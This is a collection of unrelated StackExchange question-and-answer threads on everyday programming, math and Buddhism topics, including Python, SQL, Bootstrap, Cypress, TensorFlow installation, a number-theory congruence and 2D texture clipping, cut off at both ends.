dictionaries, each dictionary represents satellite data self._data = [] for row in data_list[1:]: self._data.append({}) for pos, field in enumerate(self._fields): self._data[-1][field] = conv_fn[field](row[pos]) def get_number_satellites(self): """Returns the number of satellites in the database.""" return len(self._data) def get_sat_data(self, idx, fields): """Returns a selection of data for a given satellite. The caller provides a satellite id and list of fields. The method returns data associated with those fields for the given satellite. If the satellite is not present in database, or a specific field is not available, then an empty tuple is returned. If even one field is missing, the entire query is returned as empty. Parameters ---------- idx : int Index of satellite in database. fields : list[string] List of strings; each string is a desired field from database for given satellite Returns ------- tuple Tuple contains values in order of provided list of fields An empty tuple indicates that no data could be found """ # Hand back an empty tuple for all early exits if not (0 <= idx < self.get_number_satellites()): warn_caller(f"Satellite index {idx} out of range") return tuple() if not isinstance(fields, (tuple, list)): warn_caller("Must pass a list or tuple of fields") return tuple() values = [] for field in fields: if field in self._data[idx]: values.append(self._data[idx][field]) else: # We've hit an invalid field, so entire query is invalid warn_caller(f"Database does not contain field '{field}'") return tuple() return tuple(values) def add_field_of_data(self, field, data): """Adds a new field to satellite database The caller provides a field name and an iterable of data (eg. list or numpy array). This is added to the database. If field name is already present in database, then this method OVERWRITES existing data with what is supplied here. The amount of data must match number of satellites in database. If it does not match, then no action is performed. A warning is given and the method returns without altering the database. Parameters ---------- field : string Name of field for additional data data : list|tuple|ndarray An iterable object containing data for each satellite """ n_sats = self.get_number_satellites() if len(data) != n_sats: warn_caller( "Could not add field data because amount of data is incorrect " f"(expected {n_sats}, got {len(data)})" ) return if not isinstance(field, str): warn_caller("Only a single field of data can be added at a time") return for i in range(n_sats): self._data[i][field] = data[i] return __all__ = ["SatDB"] if __name__ == '__main__': sat_db = SatDB('test.csv') n_sats = sat_db.get_number_satellites() print(f"number of satellites in database: {n_sats}") sat_id = 23 (operator, launch_mass) = sat_db.get_sat_data(sat_id, ['operator', 'launch-mass']) print(f"id: {sat_id} operator: {operator} launch-mass: {launch_mass}") However in a separate file Im meant to import this class file and write a function that returns a tuple containing the name, mass ect of the largest object within the excel document. Im kind of lost on how to use the information already found in the class file and use it across to a different file without creating errors. Ive tried the following code: def find_largest_by_mass(testdb): idd = [] Mass = [] HEADER_ROW = 0 FIRST_ROW = 1 for index, row in enumerate(data_list): if index == HEADER_ROW: data_headers = row[2:] elif index >= FIRST_ROW: mass = row[7:] line_count = index - FIRST_ROW + 1 data_array = np.array(mass, dtype = float) However the error "name 'data_list' is not defined" testdb = SatDB('test_database.csv') (max_idx, name, max_mass) = find_largest_by_mass(testdb) print(f"{max_idx}: {name} has largest launch mass at {max_mass} kg.") The task requires use to use the function as seen where I thought using the SatDB in the first line would enable the data_list from the SatDB class to be used. Any help is very appreciated thank you. data_list is not in the scope of your function. You need to access the data from your object testdb. The data is stored in SatDB._data. You can access this memeber in your function by testdb._data However the underscore is a convention for private class members. So you need to use the getter method get_sat_dat to retrieve the needed data from your object.
common-pile/stackexchange_filtered
dynamically bind data values into a repeater I'm trying to bind the data values to a repeater, with bank names and balance of each bank. The balance is calculated as balance = sum(debit) - sum(credit), and i'm trying to get a result like: ------------------- bank name | amount| ------------------| a | 1200 | ------------------| b | 1500 | ------------------| c | 2400 | ------------------- for this i used the code: protected void bank_account() { var balance = 0; using (var context = new sem_dbEntities()) { var query = (from b in context.banks join h in context.heads on b.h_id equals h.h_id where b.bankstatus != 3 && (h.pid == 13 || h.h_id == 9) select new { b.acc_name, b.h_id }).Take(4); foreach (var item in query) { var debit1 = (from p in context.ledgers where p.h_id == item.h_id select p.debit).Sum(); var credit1 = (from q in context.ledgers where q.h_id == item.h_id select q.credit).Sum(); balance = Convert.ToInt32( debit1 - credit1); var query1 = (from b in context.banks join h in context.heads on b.h_id equals h.h_id where b.bankstatus != 3 && (h.pid == 13 || h.h_id == 9) select new { b.acc_name, b.h_id, balance }).Take(1); foreach (var item1 in query1) { Repeater1.DataSource = query1.ToList(); Repeater1.DataBind(); } } } } What does this have to do with MVC? What does this have to do with Classic ASP? comment the // foreach (var item1 in query1) i comment that line but not binding properly
common-pile/stackexchange_filtered
ModuleNotFoundError: No module named 'numpy.core._multiarray_umath' (While installing TensorFlow) I am following this tutorial to install TensorFlow(https://www.tensorflow.org/install/pip), but in the last command: python -c "import tensorflow as tf; tf.enable_eager_execution(); print(tf.reduce_sum(tf.random_normal([1000, 1000])))" I get this result: ModuleNotFoundError: No module named 'numpy.core._multiarray_umath' ImportError: numpy.core.multiarray failed to import The above exception was the direct cause of the following exception: Traceback (most recent call last): File "<frozen importlib._bootstrap>", line 980, in _find_and_load SystemError: <class '_frozen_importlib._ModuleLockManager'> returned a result with an error set ImportError: numpy.core._multiarray_umath failed to import ImportError: numpy.core.umath failed to import 2019-02-16 12:56:50.178364: F tensorflow/python/lib/core/bfloat16.cc:675] Check failed: PyBfloat16_Type.tp_base != nullptr I have already installed numpy as you can see: pip3 install numpy Requirement already satisfied: numpy in c:\programdata\anaconda3\lib\site-packages (1.15.4) So why do I get this error message and how can I fix it on Windows 10? just upgrade the numpy module using pip install --upgrade numpy it will fix your problem I upgraded numpy to 1.16.1 version and tried again the above command: python -c "import tensorflow as tf; tf.enable_eager_execution(); print(tf.reduce_sum(tf.random_normal([1000, 1000])))" and got this new result: 2019-02-16 13:12:40.611105: I tensorflow/core/platform/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 tf.Tensor(-1714.2305, shape=(), dtype=float32) It means you have successfully installed Tensorflow. Upgrading numpy from 1.15.4 to 1.16.1 also fixed this for me. Upgrade the numpy to solve the error pip install numpy --upgrade This fixed it. Tensorflow 1.13 requires Numpy 1.16 and I had 1.14 instead. I was having numpy 1.16.2 version but it was giving same error then i tried to install 1.16.1 and it worked for me. Try this: pip install --upgrade --force-reinstall numpy ensure that you're using python 3.x by running it as python3 -c "import tensorflow as tf; tf.enable_eager_execution(); print(tf.reduce_sum(tf.random_normal([1000, 1000])))" I just upgraded my numpy from 1.14.0 to 1.17.0 by the following command on Ubuntu 18.10. sudo python3.5 -m pip install numpy --upgrade No import error then. there maybe multiple reasons for this error, thus, I would go through the solutions one by one; hopefully one of the steps will solve your problems: Update your Numpy or reinstall it. Check your interpreter directory (go to setting>project>python interpreter )and the Numpy package directory(in your terminal use this command pip show Numpy). These two directories should be similar, if they are not similar go to (setting>project>python interpreter>Add interpreter>show all> show interpreter path) and then add the package directory. If none of above solutions worked, go to (setting>project>python interpreter>Add interpreter> add local interpreter) and change it from virtual environemnt to conda environemnt.
common-pile/stackexchange_filtered
Solving the Diophantine equation $t^n + 2 \equiv 0 \bmod s^n - 1$ My problem is this. find the maximal integer n, so the equation: $t^n+2\equiv0 \mod (s^n-1). $ has a solution (s,t>1 have to be integers). I would like to read your solution and even just an opinion. I'm not even sure this problem can be solved. It seems to be a difficult problem. I will write $(n,t,s)\in S$ to indicate that the triplet is a solution. Some easy observations follow. $(1,t,d+1)\in S$ for all $t$ and $d$ dividing $t$. $(2,t,2)\in S$ if $t$ is not divisible by $3$ (there are other solutions with $n=2$, like $(2,14,10)$.) If there is a solution for a number $n$, then there is a solution for any divisor of $n$. Based on the last observation, I have started a search for solutions with $n$ prime. The only one I found is $(5,8860,19)$.
common-pile/stackexchange_filtered
How to send an SMS Message using Email or HTTP Protocols I want to write a piece of PHP code that will send SMS to any number in the world. I read somewhere one can use email to do this as follows. <EMAIL_ADDRESS>⇒<EMAIL_ADDRESS> I tried this with my number and my carrier's website domain and it didn't work. I think the domain is something which is not publicly available so my job should be able to find it first. Am I right here? Also they can put some checks as what the source is when they receive the SMS so they reject. Is that true too? On the other hand, is there any way HTTP can be used to do so? This is possible, but usually you'll need a special agreement with the carrier or a third-party who'll send the sms. And it'll cost you (here in germany starting at 8-10 Cent for a small number of sms). There may be different ways to deliver sms, e-mail, http or a special api. But a simple e-mail to<EMAIL_ADDRESS>will most likely not work. I have never heard of such method. Some telcos accept e-mails sent to these addresses, but the recipient has to allow/activate this. Edit: Another method you could consider: connecting a gsm-module (or even an old mobile phone) to a server and send sms via at-commands over a serial/usb connection. You're right but my question was how do actually different carriers do that among them? Assume I am carrier a and you're carrier b, then how would your customers send my customers SMS through their phone? What request params are there and what would they need any agreement between them? I guess the smscs speak SS7 between themselves. SS7 is nothing one could connect to, you have to be a carrier (or a third-party with a large throughput). Check the web site of your mobile carrier, or contact their technical support. Email-to-SMS and HTTP-to-SMS gateways are specific to each carrier.
common-pile/stackexchange_filtered
bootstrap new row 11 columns I'm trying to create a responsive layout in Bootstrap with vertical aligned columns. The reason is that I want to have several buttons of different sizes in a responsible toolbar. Searching for ways to do it, the one that seem to work better for me is something like this codepen: http://codepen.io/anon/pen/VYpqLQ For some reason, this custom styling "float:none" seems to be making bootstrap break into a new row at 11 columns instead of 12. Why could this be? Thanks! .verti-align { border: solid 1px blue; } .verti-align > [class^="col-"], .verti-align > [class*=" col-"] { display: inline-block !important; border: solid 1px red; vertical-align: middle; float: none; } <div class="row verti-align"> <div class="col-xs-6 col-md-3">.col-md-3<br><br></div> <div class="col-xs-5 col-md-3">.col-md-3</div> <div class="col-xs-6 col-md-3">.col-md-3<br><br></div> <div class="col-xs-5 col-md-3">.col-md-3 change it to 2 and it works</div> </div> Why don't you use rows? do you mean table rows? I tried something like that before but it didn't work for me. I want everything that is on the same line to be vertically aligned but also to be able to break into two rows if the size of the view is small enough. Nope, I mean bootstrap rows. if I didn't make any mistakes, I'm using bootstrap rows in the code Can you upload an image of the normal and mobile view? of what you would like it to look like? No problem, it would be something like these: http://i.imgur.com/a4BoPrW.gif http://i.imgur.com/RKdPq9V.gif Add font-size:0 on parent div (.row) and add the font-size you want on children (.col-) .verti-align { border: solid 1px blue; font-size:0; } .verti-align > [class^="col-"], .verti-align > [class*=" col-"] { display: inline-block !important; border: solid 1px red; vertical-align: middle; float: none; font-size:15px; } Thank you very much! That made it work. Could you please tell me why does it need this change? display:inline-block creates a most of times undesiblable margin (you can not have margin between bootstrap cols). This above is one of the solutions for "removing" this margin.
common-pile/stackexchange_filtered
C# Using WebBrowser class to find open IE page and read the HTML I am trying to use the WebBrowser class in C# to find an already opened IE instance and set that open page to be handled by my WebBrowser wb variable. I know several ways of searching already open IE pages using other classes and libraries and I also know how to open the page from within WebBrowser and proceed that way but I was hoping that WebBrowser might have someway of capturing an already opened IE instance. I have searched but cannot find the answer to this, is there no way from within this class? Thank you. I don't believe WebBrowser supports this. It's running it's own IE process in the background. Might not even be the same IE version that the user is browsing with. You might want to look at using Selenium WebDriver. No. WebBrowser class is not capable to search for opened IE instances. It is designed to host its own instance of IE. Thanks for confirming this. Is there another class perhaps that can search for an already open IE instance and invoke "clicks" like the invokemember method in WebBrowser? Thank you again Below, I've posted a piece of an app I had to find an IE instance with a certain URL and Kill it. I know you said you wanted to use WebBrowswer, but this works... Of course, you'll need to import SHDocVw For Each ieWindow As InternetExplorer In interfaceWindows If ieWindow.LocationURL.Contains("myweburl.com") Then Dim ieWinHandle As IntPtr = New IntPtr(ieWindow.HWND) Console.WriteLine(ieWinHandle.ToString) ieWindow.Quit() End If Next If you wanted to invoke clicks on this, you would need to use a reference t the handle. Also, the InternetExplorer class has quite a few usefull properties and methods.
common-pile/stackexchange_filtered
Are questions requesting help with "Fake Virus" code acceptable? Just wondering if questions requesting help with Fake Viruses are considered acceptable? If the answer is no, what would the correct course of action be if someone asks a question that involves the creation of help with code used for a Fake / Joke virus? @RyanM that's kind of the point is a "Fake" virus malicious? I think so, but trying to gage the communities opinion. It's irrelevant if it's malicious or not. What constitutes a "Fake Virus" for you? I've often enough seen code that would by itself not be harmful, but the question implied the real code contained the other bits. An example would be a fake virus that simulates Petya, but doesn't harm the computer it's meant to be a joke. That to me still seems malicious. I did make a point of searching but didn't find anything, this duplicate does appear to answer my question. Might be worth leaving as it mentions "Fake Virus" specifically, which when I searched I found nothing. simply downvote it, it is as far as i know not offtopic, and so your only way is to "dislike it"
common-pile/stackexchange_filtered
Dependent Selects in Symfony2 I'm trying to make two dependent selects, but can not get ajax call to make it work. my ajax call is: var data = { tower_id:$(this).val(); }; $.ajax({ type: "POST", url: "{{ path('select_apartment')}}", data:data, success: function(data) { var $apartment_selector = $('#apartamentos_apartamentosbundle_resident_apartmentid'); $apartment_selector.html('<option>Apartamentos</option>'); for (var i=0, total = data.length; i < total; i++) { $apartment_selector.append('<option value="' + data[i].id + '">' + data[i].number + '</option>'); } } }); the method in the controller is: public function ApartmentsAction(Request $request){ $tower_id = $request->request->get('tower_id'); $em = $this->getDoctrine()->getManager(); $apartments = $em->getRepository('ApartamentosApartamentosBundle:Apartment')->findByTowerId($tower_id); return new JsonResponse($apartments);} It is as if the javascript does not call the method. the route of the method is : *@Route("/residentapt", name="select_apartment") what i am doing wrong? any ideas? thank you . $apartment_selector shouldn't have the $ symbol. It's Javascript, not PHP. 're right, I corrected but I still have the problem .. not the method of the controller is running. it is okay make the call in post? This java script is running in the onchange of the first select. Check first if your Javascript function is executed with any console.log. Yes, it is right to use POST. i check te console and it works but in the select show the quantity of elements but say : undefined .
common-pile/stackexchange_filtered
WebRequest timed out in windows service I use WebRequest in a client to consume a web service on Internet. Each request is triggered in a separate thread. It works well if hosting the client in IIS. But most of the requests will get timed out error if the client is hosted in a windows service. When I tried to debug the problem using Fiddler, the WebRequest worked well as all traffic went through <IP_ADDRESS>:8888 Without Fiddler, the traffic goes to Internet directly through a random port, and the time out problem hits again. The windows service runs under Local System account. Why do I get time out if the client is in windows service without using a proxy? Update: My original question wasn't clear. The requests are made concurrently (or at a very short interval). This is to do with the connection limit in the ServicePoint class. By default only 2 connections are allowed to the same external destination. If the destination is local, the limit will be int.Max value. That's why fiddler can magically fix the problem with the proxy. So I manually set the DefaultConnectionLimit to 100 and the requests are on wire. Adjusting HttpWebRequest Connection Timeout in C# The most common source of problems that is "magically" fixed by running Fiddler is when your .NET code fails to call Close() on the object returned by GetResponseStream(). See http://www.telerik.com/automated-testing-tools/blog/13-02-28/help-running-fiddler-fixes-my-app.aspx for more details.
common-pile/stackexchange_filtered
How to upgrade aspnetcore.dll present in C:\Windows\System32\inetsrv I tried to upgrade aspnetcore.dll present in C:\Windows\System32\inetsrv to latest version but after installing all the software from https://dotnet.microsoft.com/en-us/download, aspnetcore.dll version is not changing. I tried all installer from https://dotnet.microsoft.com/en-us/download Which installer will upgrade the version I have nothing in my C:\Windows\System32\inetsrv. You can have a look at C:\Program Files (x86)\dotnet\shared Microsoft.AspNetCore.App ,there you may find the version of aspnetcore.dll that you want. Hi Quing Guo , thanks for your kind reply but in my case the dll is present in System32\inetsrv folder
common-pile/stackexchange_filtered
Plot probability mass function of fractional hamming distance using Python I would like to plot the pmf of a list of fractional hamming distance values (a list of numbers between 0 - 1). The following code shows what I did: import seaborn as sns import matplotlib.pyplot as plt x = [round(random.uniform(0.2, 0.6),2) for i in range(1000)] sns.distplot(x, hist=False) plt.show() The x is the sample list of fractional hamming distance values. And I want to show the distribution of these values. As the figure shows, the y-axis scale is wired. The pmf value should be within [0, 1] but in the figure it beyonded 1. I do not know how to solve this problem. Could you give me some suggestions? Thank you! There isn't really anything "weird" here. The plot shows the probability density function (pdf). Showing a probability mass function makes sense for discrete values. In case you want to treat your values discretely and plot a pmf, you could use numpy.unique() import numpy as np import matplotlib.pyplot as plt x = np.round(np.random.uniform(0.2, 0.6, 1000),2) u, cnt = np.unique(x, return_counts=True) plt.stem(u, cnt/len(x), use_line_collection=True) plt.ylim(0,None) plt.show() Got it! Thanks for your answer!
common-pile/stackexchange_filtered
Is the attempt to understand others a form of value judgement? In a recent conversation and in an attempt to understand others, i found myself not able often understand the actions or behaviors of others to leading to a sense of mind numbness. If i am not able to understand the actions of others, i find that i am in a state of not understanding and my mind/brain attempts to make sense of it. This can be extremely vicious since i am unable to let go and i often find myself in an infinite loop of sorts which in many situations is very demotivating, depressing and saddening. Should i not attempt to understand the behaviors of others especially if they have cause harm be it mental, physical or emotional? If i do not understand their actions, how does one approach the individual? If i did understand, is it a form of value judgement? If i were to abandon the choice to understand, is it a form of value judgement? Examples - This are real-world situations i have faced For example, if i were approached by an individual who had traumatized another and my inability to reconcile their behavior made it highly saddening as to why one would hurt another? Another example is when i find others taking a short term view of situations or simply not working with others in a cohesive manner (looking after their own interests). The unwillingness to help when help is sought or to forsake other priorities when attention is needed in other areas I am unsure what the Buddha would do in situations such as these. If he were approached by a murderer for example, what would the Buddha's do, say, not say, etc? look up Angulimala for how the Buddha would treat a murderer. Even when everyone's motivation is understood, there is still the challenge of overcoming our habitual reaction to their actions. Most people like to blame others, and not look deeply inside and effect change. Explaining to someone why they act the way they do won't change their action. Often they are powerless. All we can do is look inside and change our reaction to everyone's actions. This is one of the interesting aspects of Buddhism, that in its ideal form it doesn't allow prejudice (valid or otherwise) to interfere with the teaching. The Buddha taught people of all sorts, good and bad. "Brethren, the omniscient Buddha whose wisdom is vast, ready, swift, sharp, crushing heretical doctrines, after having converted, by the power of his own knowledge, the Brahmins Kūṭadanta and the rest, the ascetics Sabhiya and the rest, the thieves Aṅgulimāla &c., the yakkhas Āḷavaka &c., the gods Sakka and the rest, and the Brahmins Baka &c., made them humble, and ordained a vast multitude as ascetics and established them in the fruition of the paths of sanctification." -- Jāt 542 (Cowell, trans) The only distinction he seems to have made when deciding who to teach is between worthwhile and pointless. Now the Blessed One thought: 'To whom shall I preach the doctrine first? Who will understand this doctrine easily?' Mv 1.6 (Rhys-Davids, trans) Since Buddhism teaches the overcoming of partiality, the first thing one should accomplish when trying to come to terms with other people's behaviour is to free oneself from sadness or anger at the bad deeds of others. Whether that venerable one dwells in the Sangha or alone, while some there are well behaved and some are ill behaved and some there teach a group, while some here are seen concerned about material things and some are unsullied by material things, still that venerable one does not despise anyone because of that. -- MN 47 (Bodhi, trans) Having said and quoted all this, on to your questions: 1. Should i not attempt to understand the behaviors of others especially if they have cause harm be it mental, physical or emotional? There is no reason to single out such behaviours. But the question of whether one should ever attempt to understand the behaviours of others is more interesting. The goal of Buddhism is ostensibly the attainment of freedom from suffering. Insofar as understanding the behaviours of others leads to freedom from suffering, it should be pursued. Certainly, understanding others is considered useful in understanding oneself; it is also useful in helping others to understand themselves, as you can then provide advice and point out (tactfully) facets the other person may be missing about their situation. 2. If i do not understand their actions, how does one approach the individual? Buddhism doesn't recognize the existence of an individual in ultimate reality. Hence, taking the present for what it is. This helps immensely in interpersonal relations, as one need not bear grudges or prejudge others based on their past. Since beings are fluid and dynamic, the best way to approach others is with an open mind, ready to take them at face value in the present moment. 3. If i did understand, is it a form of value judgement? In Buddhism, we tend to think more in terms of partiality than judgement. Judging whether something is good or evil can be wisdom based; partiality is always based on delusion (or more directly, one of four: desire, anger, delusion, or fear - the four agati). So, understanding whether someone's actions are good or bad is useful; liking or disliking them is harmful. 4. If i were to abandon the choice to understand, is it a form of value judgement? I guess you mean is it a form of e.g. aversion if you reject the impulse to understand others? If so, then for sure it can be; it all depends on one's mindset. In general, the Buddha was critical of those who refuse to help others: ‘In the same way, Lohicca, if anyone should say: “Suppose an ascetic or Brahmin were to discover some good doctrine and thought he ought not to declare it to anyone else, for what can one man do for another?” he would be a source of danger to those young men of good family who, following the Dhamma and discipline taught by the Tathāgata, attain to such excellent distinction as to realise the fruit of Stream-Entry, of Once-Returning, of Non-Returning, of Arahantship — and to all who ripen the seeds of a rebirth in the deva-world. Being a source of danger to them, he is uncompassionate, and his heart is grounded in hostility, and that constitutes wrong view, which leads to ... hell or an animal rebirth. -- DN 12 (Walshe, trans) but this doesn't mean one need go out of one's way to try and figure others out, just that one should help others as appropriate. And of course, in order to help, one must understand. One should first establish oneself in what is proper; then only should one instruct others. Thus the wise man will not be reproached. -- Dhp 158 (Buddharakkhita, trans) In summary, understand others is useful in that it gives the potential to help oneself and others. It is partiality that is problematic, as well as obsession with others to the extent that one forgets oneself. Thank you yuttadhammo. You pointed to a number of things and this leads to wanting to understand it deeper. You comment that there is no need to single out behaviors. What if these behaviors repeat? Wouldn't the acceptance of such behaviors simply reinforce the actions? Isn't that simply human that if one sees that the behavior is validated (or ignored), one continues with it? You note that the best way to approach others is with an open mind, ready to take them at face value in the present moment. I appreciate this however how does wisdom play a role in this. For example, over the course of one's life and experiences, do this not provide pointers or hints to what is being confronted? For example, as a child i was raised in an environment surrounded by violence, lies, etc. This led to learning body language, the behaviors exhibited and whether the person could be trusted. I am far from being a saint however am tired of the continuous role playing and facades of keeping up appearances. We tend to wear masks when at work, with friends, with loved ones, etc. I don't want to be a dichotomy of each one of these. You make the final comment that It is partiality that is problematic, as well as obsession with others to the extent that one forgets oneself. I agree hence i am tired, confused and am wanting to take a different path. I want to help (especially when i can see it being valuable to not just myself but others). I want to reduce the playtime of the concepts of superiority or inferiority. I want to contribute and would like others to for the greater good. I feel like i am lost, fighting a losing battle with others and myself. You also note that but this doesn't mean one need go out of one's way to try and figure others out. Where does one draw the line in the sand be it understanding or allowing certain behaviors and actions? One of the reasons for not "understanding" others is our own unwillingness to accept that others can act out of malice, selfishness and basically unskillfully. Their actions are conditioned by their upbringing, their values, friends, families, books they read, goals they want etc.. Can we really understand their conditionings when they are that numerous? We accept that they behave badly because of their conditioning. If you and I had their conditioning we would behave exactly the way they do, because we are conditioned. People behave because they are conditioned both good and bad. How hard is it to change our own conditioning and how much more difficult others conditioning. If we want (craves) to change others, and that craving is not satisfied, suffering arises (2nd noble truth). One can earnestly try and then accept the results as there are and no suffering arises and then try again, and again..
common-pile/stackexchange_filtered
How can I access my Windows partition as an ordinary user? I have a dual boot laptop with Win7 and Ubuntu 11.10. Since few days my Ubuntu does not mount automatically the win partition or a usb drive. It's also not possible to change the desktop wallpaper. I "fixed" the win partition by hand modifying /etc/fstab. I also played a bit and now Ubuntu mount the usb drive. On the other hand I cannot unmount them because umount: only root can unmount UUID=521832F21832D4A7 from /media/WINDOWS But my account is admin, so I do not understand why I have this message. If I unmount with sudo from terminal there is no problem. For the wallpaper I have no error message but I can't change anything. I also tried to assign my account to "normal" user group and then back to admin group: useless. I believe that even if my account is administrator there is something messed up with permissions. Few days ago a guest played a bit with my account and the standard guest user (he couldn't unlock as he forgot the password). I don't know if this could be the cause, but at the moment I don't understand what it could be. Thank you for your help When you run the sudo command in the Terminal, that causes what you type after sudo to be run as root. This is why it works from the Terminal--because the technique you are using makes you act as root. Being an administrator does not mean you are root, or that most of what you do is done as root. It does mean that you can perform actions as root with a couple of built-in facilities (one of which is sudo). When partitions are mounted automatically from /etc/fstab, the mount operation is performed by root, so it is necessary to be root (or run a command as root) to undo it. This is the normal and expected behavior, and not a bug. When you mount partitions dynamically as a non-root user, behind the scenes, that uses udisks --mount. Then you can unmount them automatically with udisks --unmount (which is what happens behind the scenes when you unmount them). The way you fixed your problem prevents this from happening, because /etc/fstab entries are not mounted/unmounted dynamically with udisks. So it seems that the way you've fixed your problem does not fully suit your needs. I recommend that you post a new question detailing the problem you were experiencing, so that someone can help you make automatic, non-root mounting and unmounting of your Windows partition work again. I didn't know that fstab does its job under root (even in ubuntu where there is no root?). The udisks thing seems promising but everything worked out of the box after installation (months ago) without configuring anything. At this point I cannot use the touchpad anymore and still having the wallpaper problem. Is there a way to understand if this is a permission problem? @ray The touchpad problem is also probably a separate problem. To address your question about there being "no root" in Ubuntu: In Ubuntu, there absolutely is a root account. It just has logins disabled. Logging in as root is not supported, recommended, or necessary, because the system provides facilities like sudo to allow a non-root user to perform actions as root. The root account still does exist. Run top in the Terminal, and you'll see plenty of programs running as root as part of the system. (Press q to quit top.) It seems the touchpad is going away after trying to unmount the win partitions from nautilus. And now I noticed my terminal disappeared from the Launcher (i usually call it from a shortcut, that's why I didn't see it before!). I will follow your suggestion trying to split the problem in different questions even if their concurrent appearance hints, IMO, a common root cause. Thank you anyway for your information
common-pile/stackexchange_filtered
Increasing iframe height I am loading a "html" page in to a div( ex: #targets) using jquery load().The the div comes under the iframe. After loading the html file, the div height and iframe height not getting increased based on the html file content height. How to change the iframe and div height based on the htm contents in the div. Any feedback to the answers given? Do none work out for you??? try this css code: div, iframe { overflow:auto; height:auto; } I suggest reading this blog post jQuery iFrame Sizing // For some browsers (for opera, safari check blog post, chrome?) $('iframe').load(function() { this.style.height = this.contentWindow.document.body.offsetHeight + 'px'; });
common-pile/stackexchange_filtered
Find Set of record rowno from multiple column I have two sql temp table #Temp1 and #Temp2, and I want to get rowid which contain set of temp table two E.g. In table Temp2 have 4 record i want to search in temp table #Temp1 which contain userid departmentid set of record CREATE TABLE #Temp1(rowid INT, userid INT, departmentid int) CREATE TABLE #Temp2(userid INT, deparetmentid int) INSERT INTO #Temp1 (rowid,userid,departmentid ) VALUES (1,1,1),(1,2,2),(1,3,3),(1,4,4),(1,2,1), (2,2,1),(2,2,2),(2,3,3),(2,4,4), (3,3,1),(3,2,2),(3,3,3),(3,4,4) INSERT INTO #Temp2 (userid,departmentid ) VALUES (2,1),(2,2),(3,3),(4,4) DROP TABLE #Temp1 DROP TABLE #Temp2 i want output rowid 2 because it contain set of (2,1),(2,2),(3,3),(4,4) one thing in rowid also contain same set of record it its have one more row mean when i search in temp1 table based on rowid 1 then i found 4 record and when i search rowid 2 then it contain 4 record so that it is same set of record which i found Thanks Would you still want row 2 if it had another pair, such as (2, 1, 1)? I've rollbacked question to its original state. Please do not make such changes because you invalidated existing answers, if you need further assistance consider asking new question. Let's assume the rows in table1 are unique. Then you can do this using join and group by: select t1.rowid from #table1 t1 left join #table2 t2 on t1.userid = t2.userid and t1.departmentid = t2.departmentid group by t1.rowid having count(*) = (select count(*) from #table2 t2) and count(*) = count(t2.userid) ; This assumes no duplicates in either table. Note: This returns rows that are identical to or a superset of the values in the second table. but it given me rowid 1 which i did`t want i want only 2 @bhupendrasingh . . . It wasn't clear to me if you wanted supersets or not. I adjusted query. @GordonLinoff You can't reffer to t2 with having count(*) = (select count(*) from t2). You will get invalid object error. its taking long time to executing @bhupendrasingh . . . You want indexes on (userid, departmentid) in both tables. i make some change in temp1 table how update row same on every record then this query not working You could use: SELECT rowid FROM #Temp1 t1 WHERE NOT EXISTS(SELECT userid, departmentid FROM #Temp1 tx WHERE tx.rowid=t1.rowid EXCEPT SELECT userid, departmentid FROM #Temp2) GROUP BY rowid HAVING COUNT(*) = (SELECT COUNT(*) FROM #Temp2); Output: 2 Rextester Demo i make some change in temp1 table how uplate row same on every record then this query not working
common-pile/stackexchange_filtered
How to share response data across multiple suites? Let's say we have the following suite: describe('Devices', () => { describe('Master Data Set-Up', () => { it('should create the device if necessary', () => { cy.createDevice() its('body.id') .as('deviceId'); }); }); describe('Test Suite 1', () => { it('should allow to send data to device', () => { cy.get('@deviceId').then((deviceId) => { cy.sendData(deviceId, 'Some Data'); }); }); }); }); So, we have a set up suite that creates master data. This is a simplified version, actually it contains a couple of it specs and I'd like to keep it like that because it's better to read in the Cypress output. Then, there is the actual test suite that want's to use data that has previously been created. In this case a server generated id that should be used for another REST call. This is assuming, that cy.createDevice and cy.sendData are custom commands available that internally use cy.request. When running that, cy.get('@deviceId') fails because aliases are not shared across describe blocks AFAIK. I tried to use let deviceId but it's undefined as it is not yet available when the test specs are processed. What is a proper way to do this? Hi. Beside global variable which is an anti-pattern, this post could be helpful: https://github.com/cypress-io/cypress/issues/1392#issuecomment-660588861 May be try using writeFile https://docs.cypress.io/api/commands/writefile.html and readFile https://docs.cypress.io/api/commands/readfile.html#Syntax Ok, so first thanks to Aloysius and Arek for their answers. But I had the gut feeling that there must be some easier way to do this that writing an Id to a file. As I mentioned before, I had issues with my first attempt to use a global variable: I tried to use let deviceId but it's undefined as it is not yet available when the test specs are processed. I really wanted to understand, why this did not work and did some console debugging. I added a console log: describe('Devices', () => { console.log('Loading test suites...') (...) }); When running the tests, I saw the log output twice, once after the first describe block where the device id was stored and then a second time after the master data was written. Actually, I found out that this issue was cause by the following known Cypress issue: https://github.com/cypress-io/cypress/issues/2777 After setting the baseUrl, it actually works: describe('Devices', () => { let deviceId; before( () => { Cypress.config('baseUrl', Cypress.env('system_url')) cy.visit('/'); }) describe('Master Data Set-Up', () => { it('should create the device if necessary', () => { cy.createDevice() .its('body.id') .then((id) => { deviceId = id; }); }); }); describe('Test Suite 1', () => { it('should allow to send data to device', () => { cy.sendData(deviceId, 'Some Data'); }); }); }); I believe this will be better solution, as cypress is asynchronous so it's better to write it on file and read it describe('Devices', () => { describe('Master Data Set-Up', () => { it('should create the device if necessary', () => { cy.createDevice() ...... cy.writeFile('deviceId.txt', body.id) }); }); describe('Test Suite 1', () => { it('should allow to send data to device', () => { cy.readFile('deviceId.txt').then((device_id) => { cy.sendData(device_id, 'Some Data'); }) }); }); }); This can fail if tests run in parallel. Better to get the id in a before(). Also the pattern you want for saving is cy.createDevice().its('body.id').then(id => cy.writeFile('deviceId.txt', id)).
common-pile/stackexchange_filtered
Clip or Mask a 2D texture Hey i was wondering if anyone knows to do clipping with 2D textures for a gui or menu like system. Heres an example output i would like to produce Have a game screen with a size of 500 x 500. With a screen behind it with a size of 1000 x 1000. When i draw a Texture at 0, 0 with the parent screen of 500 x 500 i would like the component not to be shown but if i draw the component at 500, 450 and the texture width and height are 100 i would expect to only see the whole width but only half the height of the component. I was wondering if there is an easy way about doing this? Edit: Basically i was thinking something like a mask effect in Photoshop. here is a picture Clipping picture The black outline is where the other half of the texture would be drawn. You can clip a texture. When the resulting shape is polygonal, you can do it by simply modifying the vertices and texture coordinates. When the clipped texture is a complicated shape, then things get trickier. You can also clip by just drawing everything in the right order. It may not be efficient, but it is easy. p.s. A picture would help here. Another way to solve this problem: Basically you have two scenes to draw: the game screen (the blue part in your picture) and the background screen (red part of your picture). I think that you could draw the game screen and the backgrond screen in two different bitmap objects (or whatever similar you have in your graphics library). The next step is to clip the entire background screen bitmap to the output bitmap object and then you could clip just the central part (a 500 